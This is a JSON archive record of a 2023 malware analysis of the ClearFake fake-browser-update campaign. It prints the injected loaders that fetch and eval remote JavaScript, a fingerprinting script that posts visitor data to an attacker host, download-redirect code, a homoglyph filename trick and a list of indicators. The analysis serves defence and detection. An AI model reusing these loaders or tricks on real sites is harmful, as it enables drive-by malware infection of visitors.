{
	"id": "909c3ce5-1595-48aa-a4fc-a09ab6089c54",
	"created_at": "2026-04-06T00:10:32.742923Z",
	"updated_at": "2026-04-10T03:35:21.563149Z",
	"deleted_at": null,
	"sha1_hash": "d040964e8a2265431d14216c4efa3f1308c64de8",
	"title": "ClearFake Malware Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 90907,
	"plain_text": "ClearFake Malware Analysis\r\nBy Randy McEoin\r\nPublished: 2023-08-06 · Archived: 2026-04-05 23:08:57 UTC\r\nThere are several malicious fake updates campaigns being run across thousands of compromised websites. Here I\r\nwill walk through one with a pattern that doesn’t match with others I’ve been tracking. This campaign appears to\r\nhave started around July 19th, 2023. Based on a search on PublicWWW of the injection base64 there are at least\r\n434 infected sites.\r\nI’m calling this one ClearFake until I see a previously used name for it. The name is a reference to the majority of\r\nthe Javascript being used without obfuscation. I say majority because base64 is used three times. That’s it. All the\r\nvariable names are in the clear, no obfuscation on them.\r\nOne noticeable difference from SocGholish is that there appears to be no tracking of visits by IP or cookies. As an\r\nanalyst you can you go back to the compromised site over and over coming from the same IP and not clearing\r\nyour browser cache. This also means the site owner is more likely to see the infection as well.\r\nWhen a user visits a compromised website with ClearFake, the page initially loads as normal before the whole\r\npage is taken over by a call to action to update Chrome. Here’s what it looks like along with Fiddler showing\r\nsome of the malicious web calls in yellow.\r\nUpdate Chrome\r\nInjection\r\nOn the index page of the compromised site there is a Javascript injection. The Javascript is base64 encoded.\r\nPresumably this is a dynamic injection and will change over time to reflect the new host for the initial payload.\r\n\u003cscript src=\"data:text/javascript;base64,Y29uc3QgZ2V0X3NjcmlwdD0oKT0+e2NvbnN0IHJlcXVlc3Q9bmV3IFhNTEh0dHBSZXF1ZX\r\nFor EKFiddle users you might consider adding a CustomRegex to watch for these injections.\r\nSourceCode Base64 injection \u003cscript src=\\\"data:text\\/javascript;base64,[^\\\"]+\\\"\u003e\u003c\\/script\u003e\r\nCustom Regexes\r\nI like to use CyberChef to decode such things. Here’s the injection decoded and tidied up a bit.\r\nconst get_script=()=\u003e{\r\n const request=new XMLHttpRequest();\r\n request.open('GET','https://hello-world-broken-dust-1f1c.brewasigfi1978.workers.dev/',false);request.send(nu\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 1 of 8\n\n}\r\neval(get_script());\r\nThis is a straightforward initial call for the first payload which is hosted on Cloudflare Workers. The Cloudflare\r\ndomain being used is a wildcard. I’ve seen two variations of the first portion of the FQDN.\r\nA urlscan search for the base domain shows how long it has been in use and some of the variations of the first part\r\nof the name.\r\nurlscan search\r\nPayload One\r\nThe Cloudflare worker returns a very similar Javascript that simply makes another call to a Keitaro host, but not to\r\na Keitaro endpoint.\r\nconst get_k_script=()=\u003e{\r\n let e=new XMLHttpRequest;\r\n return e.open(\"GET\",\"https://adqdqqewqewplzoqmzq.site/vvmd54/\",!1),e.send(null),e.responseText\r\n };\r\neval(get_k_script());\r\nPayload two\r\nThe second web call returns a Javascript that creates an iframe to house the fake update UI. The iframe src is set to\r\na Keitaro endpoint.\r\nconst url = \"https://adqdqqewqewplzoqmzq.site/ZgbN19Mx\";\r\nlet iframe = document.createElement(\"iframe\");\r\nconst remove_iframe = e =\u003e {\r\n \"removetheiframe\" == e.data \u0026\u0026 (iframe.parentNode.removeChild(iframe), document.body.removeAttribute(\"style\"\r\n};\r\nwindow.addEventListener(\"message\", remove_iframe, !1);\r\nconst iframe_ready = e =\u003e {\r\n window.scrollTo(0, 0), iframe.style.display = \"block\", iframe.style[\"margin-top\"] = \"\", document.body.st\r\n },\r\n create_iframe = () =\u003e {\r\n iframe.onload = iframe_ready, iframe.src = url, iframe.style.width = \"100%\", iframe.style.height = \"100%\r\n };\r\ncreate_iframe();\r\nPayload three - Keitaro\r\nThe response from the Keitaro endpoint is the foundation for the HTML to be rendered within the iframe.\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 2 of 8\n\n\u003c!DOCTYPE html\u003e\r\n\u003chtml lang=\"en\"\u003e\r\n\u003chead\u003e\u003cbase href=\"/lander/chrome/index.php\"\u003e\r\n \u003cmeta charset=\"utf-8\"\u003e\r\n \u003cmeta http-equiv=\"content-language\" content=\"en-au\"\u003e\r\n \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"\u003e\r\n \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1\"\u003e\r\n \u003clink rel=\"icon\" type=\"image/png\" sizes=\"16x16\" href=\"img/favicon-16x16.png\"\u003e\r\n \u003ctitle\u003eDocument\u003c/title\u003e\r\n \u003clink type=\"image/png\" data-href=\"p.gif\" href=\"p.gif\" class=\"pixel\"\u003e\r\n \u003cscript\u003e\r\n var token = 'uuid_2qgg8u91378u2_2qgg8u91378u264ea6606b22936.89682192',\r\n pixel = '{pixel}',\r\n subid = '2qgg8u91378u2',\r\n blank = 'X2luZGV4LnBocA==';\r\n let p = document.querySelector('.pixel'),\r\n prefix = p.href.replace(p.dataset.href, '');\r\n self.Notification \u0026\u0026 fetch(atob(blank)).then(\r\n function(r) {\r\n return r.text().then(function(t) {\r\n document.write(t.replaceAll('{static_prefix}', prefix))\r\n })\r\n }\r\n );\r\n \u003c/script\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nThe blank var base64 decoded is _index.php . Since the base href is set, when fetch() is called the path to\r\nbe used will be /lander/chrome/_index.php .\r\n_index.php\r\n_index.php finally contains all the HTML/CSS to build the fake update webpage.\r\n_index\r\nIt also contains two malicious components.\r\nFingerprint\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 3 of 8\n\nFingerprintJS is included within _index.php. Next to the bottom it is used to fingerprint the browser and send the\r\nresults to the threat actor at stats-best.site . This will happen as the page renders.\r\n\u003cscript onload=\"initFingerprintJS()\"\u003e function initFingerprintJS() {\r\n FingerprintJS.load().then(fp =\u003e {\r\n fp.get().then(result =\u003e {\r\n const visitorId = result.visitorId;\r\n FPID = visitorId;\r\n var Data = {FPID : visitorId,FPData : btoa(JSON.stringify(result)),Domain : window.location.hostname};\r\n var Link_Connect = 'https://stats-best.site/fp.php';\r\n var saveData = $.ajax({\r\n type: 'POST',\r\n url: Link_Connect,\r\n data: Data,\r\n dataType: \"text\",\r\n //success: function(resultData) { console.log(resultData) }\r\n });\r\n //Cookies.set('FPID', visitorId);\r\n });\r\n });\r\n }\r\n $('.DownloadMouse').hover( function(){DownloadMouse=true;});\r\n initFingerprintJS();\r\n\u003c/script\u003e\r\nDownload hero\r\nThe last malicious chunk of Javascript within _index.php is used to make the Update Chrome button clickable.\r\n\u003cscript\u003e\r\n document.getElementById('js-download-hero').onclick = (e) =\u003e {\r\n e.preventDefault();\r\n var params = new URLSearchParams(document.location.search.substr(1));\r\n var _subid = subid || getSubId();\r\n var _token = token || getToken();\r\n var _pixel = pixel || getPixel();\r\n params.set(\"_token\", _token);\r\n setCookie(\"pixel\", _pixel);\r\n setCookie(\"token\", _token);\r\n setCookie(\"subid\", _subid);\r\n setCookie(\"FPID\", FPID);\r\n setCookie(\"DownloadMouse\", DownloadMouse);\r\n var data = JSON.stringify({\r\n FPID: FPID,\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 4 of 8\n\nDownloadMouse: DownloadMouse,\r\n Domain: window.location.hostname,\r\n RGET: 'W10=',\r\n FileID: '12CR3zJzTg'\r\n });\r\n try {\r\n var url = new URL(location.protocol + '//' + location.host + atob('P19scD0x'));\r\n url.searchParams.append('FPID', FPID);\r\n url.searchParams.append('DownloadMouse', DownloadMouse);\r\n url.searchParams.append('D', btoa(data));\r\n // url.searchParams.append('timestamp', ts);\r\n params.forEach(function(v, k) {\r\n if ([...url.searchParams.keys()].includes(k)) {return;}\r\n url.searchParams.append(k, v);\r\n });\r\n window.location.href = url.toString();\r\n } catch (e) {\r\n console.error(\r\n `[Exception] Bad params: unexpected link '${url.href}' for new Url()`\r\n );\r\n }\r\n }\r\n\u003c/script\u003e\r\nUpon clicking the button, the URL is built with various parameters. Again there is a touch of base64 for the path.\r\nHere it is P19scD0x which decodes to ?_lp=1 .\r\nAn example fully built URL would look like this.\r\nhttps://adqdqqewqewplzoqmzq.site/?_lp=1\u0026FPID=bf323fcc78558f702aa91668e1f2996b\u0026\r\nDownloadMouse=true\u0026D=eyJGUElEIjoiYmYzMTNmY2M3ODUxOGY3MDJhYTk5NjY4ZTFmMjk5NmIiL\r\nCJEb3dubG9hZE1vdXNlIjp0cnVlLCJEb21haW4iOiJhZHFkcXFld3Fld3Bsem9xbXpxLnNpdGUiLCJ\r\nSR0VUIjoiVzEwPSIsIkZpbGVJRCI6IjEyQ1Izekp6VGcifQ%3D%3D\u0026_token=uuid_2qgq8u92368u\r\n2_2qgu8u91g78u264ea6606b22936.85686112\r\nOf note is the FPID parameter. It is the FingerprintJS visitorId which was sent earlier to stats-best.site . This\r\nappears to be a unique identifier that presumably should make it difficult for analysts to arbitrarily replay or poke\r\nat the final endpoint.\r\nThis download endpoint will be a 302 redirect to where the malicious executable is that the user will see\r\ndownloaded.\r\nRedirect to download\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 5 of 8\n\nWhen this campaign was first observed yesterday the redirect was to login.live.com and required a login to\r\nOutlook. Sadly the payload was not there. Today it is for a OneDrive file with a URL that looked like this.\r\nhttps://1ltveg.bn.files.1drv.com/y4mAk..2Njigg/Chr%D0%BEm%D0%B5S%D0%B5tu%D1%80.exe?download\u0026psid=1\r\nOf note here is the obscured filename which url encoded is this.\r\nChr%D0%BEm%D0%B5S%D0%B5tu%D1%80.exe\r\nVisually the end user will see ChrоmеSеtuр.exe but technically the characters are non-standard and hamper\r\ndetections based simply on the string ChromeSetup.exe .\r\nOnce downloaded if the user runs the EXE they’ll become infected with Amadey as this report shows.\r\nTriage report\r\nTiming\r\nI like to use SSL certs as one method to determine when malicious domains come online. With the domains I’ve\r\nseen so far, the earliest date is July 19th.\r\nKeitaro\r\n* Server certificate:\r\n* subject: CN=borbrbmrtxtrbxrq.site\r\n* start date: Aug 22 12:46:47 2023 GMT\r\n* expire date: Nov 20 12:46:46 2023 GMT\r\n* common name: borbrbmrtxtrbxrq.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=adqdqqewqewplzoqmzq.site\r\n* start date: Aug 22 12:19:03 2023 GMT\r\n* expire date: Nov 20 12:19:02 2023 GMT\r\n* common name: adqdqqewqewplzoqmzq.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=wnimodmoiejn.site\r\n* start date: Aug 17 08:02:41 2023 GMT\r\n* expire date: Nov 15 08:02:40 2023 GMT\r\n* common name: wnimodmoiejn.site\r\n* issuer: CN=E1,O=Let's Encrypt,C=US\r\n* Server certificate:\r\n* subject: CN=wffewiuofegwumzowefmgwezfzew.site\r\n* start date: Aug 18 08:53:35 2023 GMT\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 6 of 8\n\n* expire date: Nov 16 08:53:34 2023 GMT\r\n* common name: wffewiuofegwumzowefmgwezfzew.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=komomjinndqndqwf.store\r\n* start date: Aug 18 08:15:52 2023 GMT\r\n* expire date: Nov 16 08:15:51 2023 GMT\r\n* common name: komomjinndqndqwf.store\r\n* issuer: CN=E1,O=Let's Encrypt,C=US\r\n* Server certificate:\r\n* subject: CN=omdowqind.site\r\n* start date: Jul 28 07:21:20 2023 GMT\r\n* expire date: Oct 26 07:21:19 2023 GMT\r\n* common name: omdowqind.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\nSupport sites\r\n* Server certificate:\r\n* subject: CN=brewasigfi1978.workers.dev\r\n* start date: Jul 19 14:07:05 2023 GMT\r\n* expire date: Oct 17 14:07:04 2023 GMT\r\n* common name: brewasigfi1978.workers.dev\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\n* Server certificate:\r\n* subject: CN=stats-best.site\r\n* start date: Jul 23 15:30:01 2023 GMT\r\n* expire date: Oct 21 15:30:00 2023 GMT\r\n* common name: stats-best.site\r\n* issuer: CN=GTS CA 1P5,O=Google Trust Services LLC,C=US\r\nIOCs\r\nCloudflare Workers\r\nhello-world-broken-dust-1f1c.brewasigfi1978.workers.dev\r\nhello-world-hidden-hat-62a9.brewasigfi1978.workers.dev\r\n*.brewasigfi1978.workers.dev\r\nKeitaro and Assets\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 7 of 8\n\nadqdqqewqewplzoqmzq.site\r\nborbrbmrtxtrbxrq.site\r\nkomomjinndqndqwf.store\r\nomdowqind.site\r\nwffewiuofegwumzowefmgwezfzew.site\r\nwnimodmoiejn.site\r\nFingerprinting\r\nstats-best.site\r\nHash\r\n10f504133a652d196aa14eb26d55d0b53da16590584696a1f282a95bb3e9c08a\r\nC2\r\n45.9.74.182/b7djSDcPcZ/index.php\r\nSource: https://rmceoin.github.io/malware-analysis/clearfake/\r\nhttps://rmceoin.github.io/malware-analysis/clearfake/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://rmceoin.github.io/malware-analysis/clearfake/"
	],
	"report_names": [
		"clearfake"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434232,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d040964e8a2265431d14216c4efa3f1308c64de8.pdf",
		"text": "https://archive.orkl.eu/d040964e8a2265431d14216c4efa3f1308c64de8.txt",
		"img": "https://archive.orkl.eu/d040964e8a2265431d14216c4efa3f1308c64de8.jpg"
	}
}